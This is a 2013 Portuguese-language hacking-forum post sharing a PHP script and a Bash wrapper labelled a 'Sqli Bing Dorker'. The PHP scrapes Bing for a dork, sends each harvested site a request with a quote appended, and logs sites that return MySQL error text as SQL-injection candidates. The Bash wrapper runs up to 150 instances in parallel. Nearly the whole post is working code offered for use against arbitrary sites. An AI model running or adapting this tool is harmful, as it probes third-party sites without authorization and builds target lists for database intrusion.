[PHP/BASH] Simple Sqli Bing Dorker

n4sss

Elite Hacker

Registrado em: Aug 2010

Posts: 233
- Share
- Tweet
Font Size

#1

Tools [PHP/BASH] Simple Sqli Bing Dorker

18-08-2013, 21:07

Script simples que tem como funçao a captura de sites via bing para verificação de sqli.
Feito isso o script gera o log com os resultados.

PHP Code:

Código PHP:

<?php /* * php bing-dorker.php dork * sh bing-dorker.sh dork_file * sqli_vulns.txt to results. * * php -> http://pastebin.com/VWMbSw7r * bash -> http://pastebin.com/ZE6V1m0E * https://www.youtube.com/watch?v=Li2xNPDbzOU * * http://Janissaries.org * 2013 * */ set_time_limit(0); error_reporting(0); class Colors { private $foreground_colors = array(); private $background_colors = array(); public function __construct() { $this->foreground_colors['light_blue'] = '1;34'; $this->foreground_colors['light_green'] = '1;32'; $this->foreground_colors['white'] = '1;37'; } // Returns colored string public function getColoredString($string, $foreground_color = null, $background_color = null) { $colored_string = ""; // Check if given foreground color found if (isset($this->foreground_colors[$foreground_color])) { $colored_string .= "\033[" . $this->foreground_colors[$foreground_color] . "m"; } // Check if given background color found if (isset($this->background_colors[$background_color])) { $colored_string .= "\033[" . $this->background_colors[$background_color] . "m"; } // Add string and end coloring $colored_string .= $string . "\033[0m"; return $colored_string; } // Returns all foreground color names public function getForegroundColors() { return array_keys($this->foreground_colors); } // Returns all background color names public function getBackgroundColors() { return array_keys($this->background_colors); } } $c = new Colors; function save_content($content, $file){ $fp = fopen($file, "a"); fwrite($fp, $content."\r\n"); fclose($fp); } function sec($site){ preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites); if(preg_match("/www/",@$sites[0][0])){ return $site=str_replace("index.php","",$sites[0][0]); } else{ return $site=str_replace("http://","http://www.",str_replace("index.php","",@$sites[0][0])); flush(); } } function sqli($host, $threads){ $sqli = "sqli_vulns.txt"; // sqli vulns. $multi = curl_multi_init(); $bol = array_chunk($host, $threads); $cntz = 1; foreach($bol as $site){ for($i=0;$i<=count($site)-1;$i++){ $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, 'http://'.$site[$i].'\''); curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch[$i], CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0"); curl_setopt($ch[$i], CURLOPT_TIMEOUT, 8); curl_multi_add_handle($multi, $ch[$i]); }do{ curl_multi_exec($multi, $handle);usleep(1);}while($handle>0); foreach($ch as $ch_id => $cnt) { $grep[$ch_id] = curl_multi_getcontent($cnt); curl_multi_remove_handle($multi,$cnt); print "[$cntz] Fuzzing!!!\n"; if(preg_match('/Mysql_|SQL|mysql_num_rows()|mysql_fetch_assoc()|mysql_result()|mysql_fetch_array()|mysql_numrows()|mysql_preg_match()/',$grep[$ch_id])) { $fp = fopen($sqli, "a"); fwrite($fp, $site[$ch_id]."\n"); fclose($fp); flush(); } $cntz++; } } } function parse_content($file){ $content = array_filter(array_unique(explode("\n", file_get_contents($file)))); unlink($file); foreach($content as $new_content) { $fp = fopen($file, "a"); fwrite($fp, $new_content."\r\n"); fclose($fp); } print "\n\n"; print "======================================\n"; print "[+] FinisheD! All content parsed in => $file\n"; print "Total urls: [".count(file($file))."]\n"; print "======================================\n"; print "Fuzzing sites to sqli\n"; flush(); } function ger_log(){ $rand_1 = rand(); $rand_2 = $rand_1."_tmp"; $a = fopen($rand_2, "a"); fclose($a); return $rand_2; } function bing($dork,$log){ $c = new Colors; $array = array(); print "Dork: [".$dork."]\n"; $pageNum = 0; while(true || $pageNum <= 50000) { $bing = "http://www.bing.com/search?q=".str_replace(" ","+",$dork)."&go=&filt=all&first=".$pageNum.""; if(!preg_match("/No results found for/",Connect_Host($bing))) { preg_match_all("/<h3><a href=\"(.*?)\">/",Connect_Host($bing),$sites); if(count($sites[1])==0) {return false;} echo $c->getColoredString("[+]Greping results at page => $pageNum\n", "light_green", ""); for($i=0 ; $i < count($sites[1]);$i++) { $site = str_replace(array("http://","https://","www."),"",$sites[1][$i]); $site = substr($site, 0, strrpos( $site, '"') ); $site = str_replace("\" h=", "", $site); if(!in_array($site,$array)) { if(!preg_match("/msn|htmlstaff|facebook|imasters|revistaphp|debian/", $sites[1][$i])) { //echo $site."\n"; array_push($array,$site); flush(); save_content($site,$log); } } } $pageNum += 10; } else{echo "No results \n";flush();return false;} } //$array = array_unique($uSites); //for($i=0;$i<count($array);$i++){echo $array[$i]."<br />";} } function Connect_Host($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $data = curl_exec($ch); if($data) {return $data; flush();} else {return 0;} } if($argv[1]) { $dork = trim("$argv[1]"); $log = ger_log(); $threads = "10"; // Threads to check sqli echo $c->getColoredString("+------------------------------------------------------+", "white", "")."\n"; echo $c->getColoredString("Sqli Bing Dorker by n4sss\n", "light_green", ""); echo $c->getColoredString("Dork: ".$dork."\n", "white", ""); echo $c->getColoredString("+------------------------------------------------------+", "white", "")."\n"; bing($dork, $log); parse_content($log); $loq = explode("\n", file_get_contents($log)); sqli($loq, $threads); unlink($log); } ?>

Bash code:

Código:

#!/bin/bash datainicial=`date +%s` printf "=========================\n" printf "Sqli Bing dorker by n4sss\n" printf "=========================\n" cat $1 | sort | uniq > mfu.txt CONTOR=0 for i in `cat mfu.txt` do CONTOR=`ps aux | grep -c php` while [ $CONTOR -ge 150 ];do CONTOR=`ps aux | grep -c php` echo "Sleeping" sleep 5 done if [ $CONTOR -le 150 ]; then php bing-dorker.php $i > /dev/null & fi done datafinal=`date +%s` soma=`expr $datafinal - $datainicial` resultado=`expr 10800 + $soma` tempo=`date -d @$resultado +%H:%M:%S` printf "Time to launch stances: $tempo\n" printf "All ps in bg now!\n" printf "Check with ps aux | grep php to more information\n" rm mfu.txt

Youtube:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

[]'s

n4sss@m4g1cl4b~#$I
just this.
Tags: Nenhum(a)

Top

Anterior template Avançar

Unconfigured Ad Widget

Anúncio

Tools [PHP/BASH] Simple Sqli Bing Dorker